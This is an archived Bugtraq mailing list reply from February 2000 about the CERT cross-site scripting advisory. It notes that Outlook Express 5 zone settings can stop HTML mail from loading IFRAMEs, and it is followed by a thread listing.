Bugtraq mailing list archives

Re: recent 'cross site scripting' CERT advisory

From: martin () FERBER-SOFTWARE DE (Manuel Martin)
Date: Tue, 8 Feb 2000 21:44:00 +0100


Hello alltogether,

On Sat, 5 Feb 2000 10:52:11 -0700 Marc Slemko wrote:

2. Do not use a mail reader that forces you to display HTML messages.
Using something like Outlook Express is very dangerous, since it
means that you can be exploited if an email message arrives in your
inbox and is displayed.  If you do use something like Outlook
Express, be sure to configure it to disable scripting and make it
as restrictive as possible.  Unfortunately, in the case of Outlook
Express, this doesn't appear to be enough since I can't find any
setting that will stop things like IFRAMEs from automatically
loading, which are enough to make you vulnerable in many situations.
Hopefully I'm missing something.


FYI (hopefully I am right): OE 5 can be configured to use one of two
zone-settings for HTML-mail (internet or restricted). The zone-settings
can be configured to exclude loading files in an IFRAME. This is more
than many other mail-clients which show HTML offer.

Bye, MM

--
Manuel Martin
mailto:manuel () martinnet de
http://www.martinnet.de

Current thread:

Re: Fwd: CERT Advisory CA-2000-02, (continued)
- - - Re: Fwd: CERT Advisory CA-2000-02 fury (Feb 03)
    - Re: Fwd: CERT Advisory CA-2000-02 Ari Gordon-Schlosberg (Feb 03)
    - Re: Fwd: CERT Advisory CA-2000-02 Marc Slemko (Feb 03)
    - Re: Fwd: CERT Advisory CA-2000-02 Henrik Nordstrom (Feb 05)
    - Re: Fwd: CERT Advisory CA-2000-02 Byron Alley (Feb 07)
    - Re: Fwd: CERT Advisory CA-2000-02 Len Budney (Feb 08)
    - Novell GroupWise 5.5 Enhancement Pack Web Access Denial of Servic e Adam Gray (Feb 07)
    - Re: Fwd: CERT Advisory CA-2000-02 Henri Torgemane (Feb 03)
    - recent 'cross site scripting' CERT advisory Tim Hollebeek (Feb 04)
    - Re: recent 'cross site scripting' CERT advisory Marc Slemko (Feb 05)
    - Re: recent 'cross site scripting' CERT advisory Manuel Martin (Feb 08)
    - Novell BorderManager 3.5 Remote Slow Death Chicken Man (Feb 08)
    - Re: Novell BorderManager 3.5 Remote Slow Death Ron van Daal (Feb 09)
    - Re: Novell BorderManager 3.5 Remote Slow Death Puchatek (Feb 11)
    - Re: recent 'cross site scripting' CERT advisory Bill Thompson (Feb 06)
    - Re: recent 'cross site scripting' CERT advisory Ari Gordon-Schlosberg (Feb 07)
    - Re: recent 'cross site scripting' CERT advisory Taneli Huuskonen (Feb 07)
    - Re: recent 'cross site scripting' CERT advisory Peter W (Feb 08)
    - Re: recent 'cross site scripting' CERT advisory Mikael Olsson (Feb 08)
    - Re: recent 'cross site scripting' CERT advisory Henri Torgemane (Feb 08)
    - Re: 'cross site scripting' defenses flynngn () JMU EDU (Feb 06)

(Thread continues...)